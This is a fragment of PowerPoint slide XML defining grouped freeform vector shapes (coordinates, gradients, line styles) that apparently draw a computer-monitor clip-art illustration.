                    <a:gd name="T13" fmla="*/ 41 h 42"/>
                    <a:gd name="T14" fmla="*/ 0 w 97"/>
                    <a:gd name="T15" fmla="*/ 21 h 42"/>
                    <a:gd name="T16" fmla="*/ 21 w 97"/>
                    <a:gd name="T17" fmla="*/ 7 h 4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7"/>
                    <a:gd name="T28" fmla="*/ 0 h 42"/>
                    <a:gd name="T29" fmla="*/ 97 w 97"/>
                    <a:gd name="T30" fmla="*/ 42 h 4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7" h="42">
                      <a:moveTo>
                        <a:pt x="21" y="7"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="46" y="11"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="60" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="84" y="8"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="72" y="19"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="96" y="25"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="77" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="21" y="7"/>
                      </a:lnTo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70" name="Freeform 23"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2073" y="1825"/>
                  <a:ext cx="150" cy="80"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 101 w 185"/>
                    <a:gd name="T1" fmla="*/ 0 h 97"/>
                    <a:gd name="T2" fmla="*/ 185 w 185"/>
                    <a:gd name="T3" fmla="*/ 22 h 97"/>
                    <a:gd name="T4" fmla="*/ 83 w 185"/>
                    <a:gd name="T5" fmla="*/ 97 h 97"/>
                    <a:gd name="T6" fmla="*/ 0 w 185"/>
                    <a:gd name="T7" fmla="*/ 74 h 97"/>
                    <a:gd name="T8" fmla="*/ 101 w 185"/>
                    <a:gd name="T9" fmla="*/ 0 h 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5"/>
                    <a:gd name="T16" fmla="*/ 0 h 97"/>
                    <a:gd name="T17" fmla="*/ 185 w 185"/>
                    <a:gd name="T18" fmla="*/ 97 h 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5" h="97">
                      <a:moveTo>
                        <a:pt x="101" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="185" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="83" y="97"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="74"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="101" y="0"/>
                      </a:lnTo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</p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="27" name="Group 24"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1379" y="927"/>
                <a:ext cx="904" cy="1025"/>
                <a:chOff x="2614" y="840"/>
                <a:chExt cx="776" cy="880"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="37" name="Group 25"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2614" y="1299"/>
                  <a:ext cx="763" cy="421"/>
                  <a:chOff x="2614" y="1299"/>
                  <a:chExt cx="763" cy="421"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="50" name="Freeform 26"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="3113" y="1406"/>
                    <a:ext cx="263" cy="305"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 3 w 364"/>
                      <a:gd name="T1" fmla="*/ 212 h 422"/>
                      <a:gd name="T2" fmla="*/ 364 w 364"/>
                      <a:gd name="T3" fmla="*/ 0 h 422"/>
                      <a:gd name="T4" fmla="*/ 364 w 364"/>
                      <a:gd name="T5" fmla="*/ 180 h 422"/>
                      <a:gd name="T6" fmla="*/ 0 w 364"/>
                      <a:gd name="T7" fmla="*/ 422 h 42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64"/>
                      <a:gd name="T13" fmla="*/ 0 h 422"/>
                      <a:gd name="T14" fmla="*/ 364 w 364"/>
                      <a:gd name="T15" fmla="*/ 422 h 42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64" h="422">
                        <a:moveTo>
                          <a:pt x="3" y="212"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="364" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="364" y="180"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="422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E5E5E5"/>
                      </a:gs>
                    </a:gsLst>
                    <a:path path="rect">
                      <a:fillToRect l="100000" t="100000"/>
                    </a:path>
                  </a:gradFill>
                  <a:ln w="3175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1" name="Freeform 27"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="2614" y="1299"/>
                    <a:ext cx="763" cy="264"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 715 w 1091"/>
                      <a:gd name="T1" fmla="*/ 376 h 377"/>
                      <a:gd name="T2" fmla="*/ 0 w 1091"/>
                      <a:gd name="T3" fmla="*/ 187 h 377"/>
                      <a:gd name="T4" fmla="*/ 397 w 1091"/>
                      <a:gd name="T5" fmla="*/ 0 h 377"/>
                      <a:gd name="T6" fmla="*/ 1090 w 1091"/>
                      <a:gd name="T7" fmla="*/ 152 h 377"/>
                      <a:gd name="T8" fmla="*/ 715 w 1091"/>
                      <a:gd name="T9" fmla="*/ 376 h 37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91"/>
                      <a:gd name="T16" fmla="*/ 0 h 377"/>
                      <a:gd name="T17" fmla="*/ 1091 w 1091"/>
                      <a:gd name="T18" fmla="*/ 377 h 37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91" h="377">
                        <a:moveTo>
                          <a:pt x="715" y="376"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="187"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="397" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1090" y="152"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="715" y="376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E5E5E5"/>
                      </a:gs>
                    </a:gsLst>
                    <a:path path="rect">
                      <a:fillToRect l="100000" t="100000"/>
                    </a:path>
                  </a:gradFill>
                  <a:ln w="3175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2" name="Freeform 28"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="2614" y="1429"/>
                    <a:ext cx="499" cy="282"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 690"/>
                      <a:gd name="T1" fmla="*/ 5 h 390"/>
                      <a:gd name="T2" fmla="*/ 0 w 690"/>
                      <a:gd name="T3" fmla="*/ 192 h 390"/>
                      <a:gd name="T4" fmla="*/ 690 w 690"/>
                      <a:gd name="T5" fmla="*/ 390 h 390"/>
                      <a:gd name="T6" fmla="*/ 690 w 690"/>
                      <a:gd name="T7" fmla="*/ 185 h 390"/>
                      <a:gd name="T8" fmla="*/ 4 w 690"/>
                      <a:gd name="T9" fmla="*/ 0 h 39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90"/>
                      <a:gd name="T16" fmla="*/ 0 h 390"/>
                      <a:gd name="T17" fmla="*/ 690 w 690"/>
                      <a:gd name="T18" fmla="*/ 390 h 39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90" h="390">
                        <a:moveTo>
                          <a:pt x="0" y="5"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="192"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="690" y="390"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="690" y="185"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4" y="0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E5E5E5"/>
                      </a:gs>
                    </a:gsLst>
                    <a:path path="rect">
                      <a:fillToRect l="100000" t="100000"/>
                    </a:path>
                  </a:gradFill>
                  <a:ln w="3175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3" name="Freeform 29"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="2875" y="1529"/>
                    <a:ext cx="196" cy="137"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 271"/>
                      <a:gd name="T1" fmla="*/ 0 h 189"/>
                      <a:gd name="T2" fmla="*/ 271 w 271"/>
                      <a:gd name="T3" fmla="*/ 73 h 189"/>
                      <a:gd name="T4" fmla="*/ 271 w 271"/>
                      <a:gd name="T5" fmla="*/ 189 h 189"/>
                      <a:gd name="T6" fmla="*/ 0 w 271"/>
                      <a:gd name="T7" fmla="*/ 115 h 189"/>
                      <a:gd name="T8" fmla="*/ 0 w 271"/>
                      <a:gd name="T9" fmla="*/ 0 h 1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1"/>
                      <a:gd name="T16" fmla="*/ 0 h 189"/>
                      <a:gd name="T17" fmla="*/ 271 w 271"/>
                      <a:gd name="T18" fmla="*/ 189 h 18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1" h="189">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="271" y="73"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="271" y="189"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="115"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0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DFDFDF"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="27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635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4" name="Freeform 3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79" y="1580"/>
                    <a:ext cx="189" cy="49"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 261"/>
                      <a:gd name="T1" fmla="*/ 0 h 69"/>
                      <a:gd name="T2" fmla="*/ 261 w 261"/>
                      <a:gd name="T3" fmla="*/ 69 h 69"/>
                      <a:gd name="T4" fmla="*/ 0 60000 65536"/>
                      <a:gd name="T5" fmla="*/ 0 60000 65536"/>
                      <a:gd name="T6" fmla="*/ 0 w 261"/>
                      <a:gd name="T7" fmla="*/ 0 h 69"/>
                      <a:gd name="T8" fmla="*/ 261 w 261"/>
                      <a:gd name="T9" fmla="*/ 69 h 69"/>
                    </a:gdLst>
                    <a:ahLst/>
                    <a:cxnLst>
                      <a:cxn ang="T4">
                        <a:pos x="T0" y="T1"/>
                      </a:cxn>
                      <a:cxn ang="T5">
                        <a:pos x="T2" y="T3"/>
                      </a:cxn>
                    </a:cxnLst>
                    <a:rect l="T6" t="T7" r="T8" b="T9"/>
                    <a:pathLst>
                      <a:path w="261" h="69">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="261" y="69"/>
                        </a:lnTo>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:noFill/>
                  <a:ln w="3175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5" name="Freeform 31"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="2874" y="1480"/>
                    <a:ext cx="100" cy="180"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 270"/>
                      <a:gd name="T1" fmla="*/ 116 h 116"/>
                      <a:gd name="T2" fmla="*/ 1 w 270"/>
                      <a:gd name="T3" fmla="*/ 0 h 116"/>
                      <a:gd name="T4" fmla="*/ 270 w 270"/>
                      <a:gd name="T5" fmla="*/ 75 h 116"/>
                      <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                      <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                      <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                      <a:gd name="T9" fmla="*/ 0 w 270"/>
                      <a:gd name="T10" fmla="*/ 0 h 116"/>
                      <a:gd name="T11" fmla="*/ 270 w 270"/>
                      <a:gd name="T12" fmla="*/ 116 h 1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70" h="116">
                        <a:moveTo>
                          <a:pt x="0" y="116"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="1" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="270" y="75"/>
                        </a:lnTo>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:noFill/>
                  <a:ln w="6350" cap="flat" cmpd="sng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6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2892" y="1556"/>
                    <a:ext cx="153" cy="38"/>
                  </a:xfrm>
                  <a:prstGeom prst="line">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                  <a:ln w="3175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7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3022" y="1634"/>
                    <a:ext cx="29" cy="6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8" name="Freeform 34"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="2940" y="1489"/>
                    <a:ext cx="47" cy="180"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 64"/>
                      <a:gd name="T1" fmla="*/ 0 h 35"/>
                      <a:gd name="T2" fmla="*/ 1 w 64"/>
                      <a:gd name="T3" fmla="*/ 18 h 35"/>
                      <a:gd name="T4" fmla="*/ 64 w 64"/>
                      <a:gd name="T5" fmla="*/ 35 h 35"/>
                      <a:gd name="T6" fmla="*/ 64 w 64"/>
                      <a:gd name="T7" fmla="*/ 19 h 35"/>
                      <a:gd name="T8" fmla="*/ 0 w 64"/>
                      <a:gd name="T9" fmla="*/ 0 h 3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4"/>
                      <a:gd name="T16" fmla="*/ 0 h 35"/>
                      <a:gd name="T17" fmla="*/ 64 w 64"/>
                      <a:gd name="T18" fmla="*/ 35 h 3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4" h="35">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="1" y="18"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="64" y="35"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="64" y="1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905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59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2627" y="1459"/>
                    <a:ext cx="202" cy="57"/>
                  </a:xfrm>
                  <a:prstGeom prst="line">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                  <a:ln w="6350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60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2627" y="1481"/>
                    <a:ext cx="202" cy="56"/>
                  </a:xfrm>
                  <a:prstGeom prst="line">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                  <a:ln w="6350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61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2627" y="1504"/>
                    <a:ext cx="202" cy="57"/>
                  </a:xfrm>
                  <a:prstGeom prst="line">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                  <a:ln w="6350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62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2627" y="1526"/>
                    <a:ext cx="202" cy="56"/>
                  </a:xfrm>
                  <a:prstGeom prst="line">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                  <a:ln w="6350">
                    <a:solidFill>
                      <a:srgbClr val="777777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63" name="Freeform 39"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="2877" y="1540"/>
                    <a:ext cx="100" cy="180"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 275"/>
                      <a:gd name="T1" fmla="*/ 40 h 117"/>
                      <a:gd name="T2" fmla="*/ 275 w 275"/>
                      <a:gd name="T3" fmla="*/ 117 h 117"/>
                      <a:gd name="T4" fmla="*/ 275 w 275"/>
                      <a:gd name="T5" fmla="*/ 0 h 117"/>
                      <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                      <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                      <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                      <a:gd name="T9" fmla="*/ 0 w 275"/>
                      <a:gd name="T10" fmla="*/ 0 h 117"/>
                      <a:gd name="T11" fmla="*/ 275 w 275"/>
                      <a:gd name="T12" fmla="*/ 117 h 11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75" h="117">
                        <a:moveTo>
                          <a:pt x="0" y="40"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="275" y="117"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="275" y="0"/>
                        </a:lnTo>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:no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tIns="27432" bIns="27432" anchor="ctr">
                    <a:spAutoFit/>
                  </a:bodyPr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</p:grpSp>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="38" name="Group 40"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2676" y="840"/>
                  <a:ext cx="714" cy="672"/>
                  <a:chOff x="2676" y="840"/>
                  <a:chExt cx="714" cy="672"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="39" name="Freeform 41"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="2730" y="1277"/>
                    <a:ext cx="556" cy="235"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 556"/>
                      <a:gd name="T1" fmla="*/ 128 h 235"/>
                      <a:gd name="T2" fmla="*/ 238 w 556"/>
                      <a:gd name="T3" fmla="*/ 0 h 235"/>
                      <a:gd name="T4" fmla="*/ 556 w 556"/>
                      <a:gd name="T5" fmla="*/ 91 h 235"/>
                      <a:gd name="T6" fmla="*/ 556 w 556"/>
                      <a:gd name="T7" fmla="*/ 108 h 235"/>
                      <a:gd name="T8" fmla="*/ 334 w 556"/>
                      <a:gd name="T9" fmla="*/ 235 h 235"/>
                      <a:gd name="T10" fmla="*/ 0 w 556"/>
                      <a:gd name="T11" fmla="*/ 148 h 235"/>
                      <a:gd name="T12" fmla="*/ 0 w 556"/>
                      <a:gd name="T13" fmla="*/ 128 h 23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56"/>
                      <a:gd name="T22" fmla="*/ 0 h 235"/>
                      <a:gd name="T23" fmla="*/ 556 w 556"/>
                      <a:gd name="T24" fmla="*/ 235 h 235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56" h="235">
                        <a:moveTo>
                          <a:pt x="0" y="128"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="238" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="556" y="91"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="556" y="108"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="334" y="235"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="148"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="128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 w="3175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0" name="Freeform 42"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="2737" y="1282"/>
                    <a:ext cx="538" cy="208"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 538"/>
                      <a:gd name="T1" fmla="*/ 124 h 208"/>
                      <a:gd name="T2" fmla="*/ 327 w 538"/>
                      <a:gd name="T3" fmla="*/ 208 h 208"/>
                      <a:gd name="T4" fmla="*/ 538 w 538"/>
                      <a:gd name="T5" fmla="*/ 86 h 208"/>
                      <a:gd name="T6" fmla="*/ 233 w 538"/>
                      <a:gd name="T7" fmla="*/ 0 h 208"/>
                      <a:gd name="T8" fmla="*/ 0 w 538"/>
                      <a:gd name="T9" fmla="*/ 124 h 2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38"/>
                      <a:gd name="T16" fmla="*/ 0 h 208"/>
                      <a:gd name="T17" fmla="*/ 538 w 538"/>
                      <a:gd name="T18" fmla="*/ 208 h 2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38" h="208">
                        <a:moveTo>
                          <a:pt x="0" y="124"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="327" y="208"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="538" y="86"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="233" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="124"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="B2B2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635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1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2871" y="1333"/>
                    <a:ext cx="280" cy="112"/>
                  </a:xfrm>
                  <a:prstGeom prst="ellipse">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:srgbClr val="B2B2B2"/>
                  </a:solidFill>
                  <a:ln w="3175" cap="rnd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굴림" panose="020B0600000101010101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굴림" panose="020B0600000101010101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굴림" panose="020B0600000101010101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굴림" panose="020B0600000101010101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굴림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2" name="Freeform 44"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="2718" y="1337"/>
                    <a:ext cx="452" cy="126"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 646"/>
                      <a:gd name="T1" fmla="*/ 0 h 180"/>
                      <a:gd name="T2" fmla="*/ 20 w 646"/>
                      <a:gd name="T3" fmla="*/ 36 h 180"/>
                      <a:gd name="T4" fmla="*/ 574 w 646"/>
                      <a:gd name="T5" fmla="*/ 180 h 180"/>
                      <a:gd name="T6" fmla="*/ 646 w 646"/>
                      <a:gd name="T7" fmla="*/ 158 h 18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646"/>
                      <a:gd name="T13" fmla="*/ 0 h 180"/>
                      <a:gd name="T14" fmla="*/ 646 w 646"/>
                      <a:gd name="T15" fmla="*/ 180 h 18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646" h="180">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="20" y="36"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="574" y="180"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="646" y="158"/>
                        </a:lnTo>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="B2B2B2"/>
                  </a:solidFill>
                  <a:ln w="3175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3" name="Freeform 45"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="2826" y="840"/>
                    <a:ext cx="564" cy="520"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 620 w 808"/>
                      <a:gd name="T1" fmla="*/ 746 h 746"/>
                      <a:gd name="T2" fmla="*/ 808 w 808"/>
                      <a:gd name="T3" fmla="*/ 525 h 746"/>
                      <a:gd name="T4" fmla="*/ 808 w 808"/>
                      <a:gd name="T5" fmla="*/ 106 h 746"/>
                      <a:gd name="T6" fmla="*/ 336 w 808"/>
                      <a:gd name="T7" fmla="*/ 0 h 746"/>
                      <a:gd name="T8" fmla="*/ 0 w 808"/>
                      <a:gd name="T9" fmla="*/ 48 h 74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808"/>
                      <a:gd name="T16" fmla="*/ 0 h 746"/>
                      <a:gd name="T17" fmla="*/ 808 w 808"/>
                      <a:gd name="T18" fmla="*/ 746 h 74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808" h="746">
                        <a:moveTo>
                          <a:pt x="620" y="746"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="808" y="525"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="808" y="106"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="336" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="48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E5E5E5"/>
                      </a:gs>
                    </a:gsLst>
                    <a:path path="rect">
                      <a:fillToRect l="100000" t="100000"/>
                    </a:path>
                  </a:gradFill>
                  <a:ln w="3175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4" name="Freeform 46"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="3178" y="955"/>
                    <a:ext cx="113" cy="506"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 144"/>
                      <a:gd name="T1" fmla="*/ 644 h 644"/>
                      <a:gd name="T2" fmla="*/ 0 w 144"/>
                      <a:gd name="T3" fmla="*/ 79 h 644"/>
                      <a:gd name="T4" fmla="*/ 144 w 144"/>
                      <a:gd name="T5" fmla="*/ 0 h 644"/>
                      <a:gd name="T6" fmla="*/ 144 w 144"/>
                      <a:gd name="T7" fmla="*/ 554 h 644"/>
                      <a:gd name="T8" fmla="*/ 0 w 144"/>
                      <a:gd name="T9" fmla="*/ 644 h 6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4"/>
                      <a:gd name="T16" fmla="*/ 0 h 644"/>
                      <a:gd name="T17" fmla="*/ 144 w 144"/>
                      <a:gd name="T18" fmla="*/ 644 h 64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4" h="644">
                        <a:moveTo>
                          <a:pt x="0" y="644"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="79"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="144" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="144" y="554"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="644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E5E5E5"/>
                      </a:gs>
                    </a:gsLst>
                    <a:path path="rect">
                      <a:fillToRect l="100000" t="100000"/>
                    </a:path>
                  </a:gradFill>
                  <a:ln w="3175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5" name="Freeform 47"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="2676" y="846"/>
                    <a:ext cx="615" cy="172"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 638 w 782"/>
                      <a:gd name="T1" fmla="*/ 219 h 219"/>
                      <a:gd name="T2" fmla="*/ 0 w 782"/>
                      <a:gd name="T3" fmla="*/ 67 h 219"/>
                      <a:gd name="T4" fmla="*/ 160 w 782"/>
                      <a:gd name="T5" fmla="*/ 0 h 219"/>
                      <a:gd name="T6" fmla="*/ 782 w 782"/>
                      <a:gd name="T7" fmla="*/ 139 h 219"/>
                      <a:gd name="T8" fmla="*/ 638 w 782"/>
                      <a:gd name="T9" fmla="*/ 219 h 21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82"/>
                      <a:gd name="T16" fmla="*/ 0 h 219"/>
                      <a:gd name="T17" fmla="*/ 782 w 782"/>
                      <a:gd name="T18" fmla="*/ 219 h 21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82" h="219">
                        <a:moveTo>
                          <a:pt x="638" y="219"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="67"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="160" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="782" y="139"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="638" y="219"/>
                        </a:lnTo>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:ln w="3175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6" name="Freeform 48"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="2676" y="897"/>
                    <a:ext cx="502" cy="566"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 671 w 672"/>
                      <a:gd name="T1" fmla="*/ 753 h 754"/>
                      <a:gd name="T2" fmla="*/ 671 w 672"/>
                      <a:gd name="T3" fmla="*/ 160 h 754"/>
                      <a:gd name="T4" fmla="*/ 0 w 672"/>
                      <a:gd name="T5" fmla="*/ 0 h 754"/>
                      <a:gd name="T6" fmla="*/ 0 w 672"/>
                      <a:gd name="T7" fmla="*/ 578 h 754"/>
                      <a:gd name="T8" fmla="*/ 671 w 672"/>
                      <a:gd name="T9" fmla="*/ 753 h 7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72"/>
                      <a:gd name="T16" fmla="*/ 0 h 754"/>
                      <a:gd name="T17" fmla="*/ 672 w 672"/>
                      <a:gd name="T18" fmla="*/ 754 h 7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72" h="754">
